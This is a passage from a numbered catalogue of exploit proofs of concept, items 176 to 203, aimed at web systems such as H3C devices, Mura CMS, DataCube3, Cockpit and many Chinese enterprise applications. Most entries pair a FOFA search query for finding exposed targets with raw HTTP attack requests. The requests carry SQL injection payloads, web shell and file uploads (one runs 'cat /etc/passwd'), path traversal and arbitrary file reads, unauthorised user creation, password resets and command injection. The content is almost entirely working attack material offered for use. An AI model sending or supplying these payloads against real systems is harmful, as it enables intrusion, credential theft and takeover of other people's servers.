GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system used in photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450)

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA: title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA: body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA: title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}


193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA: body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA: app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA: title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. 河南省风速科技统一认证平台 password reset
FOFA: body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA: app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


199. Cockpit assetsmanager/upload endpoint file upload
FOFA: title="Authenticate Please!"

1. Run the PoC to obtain the CSRF value, then obtain a cookie, then upload and request the file to see the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, return value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, return value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA: app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正全媒体新闻采编系统 binary SQL injection
FOFA: body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. 微擎系统 AccountEdit arbitrary file upload
FOFA: body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Substitute the __VIEWSTATE and __EVENTVALIDATION values obtained above:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA: body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
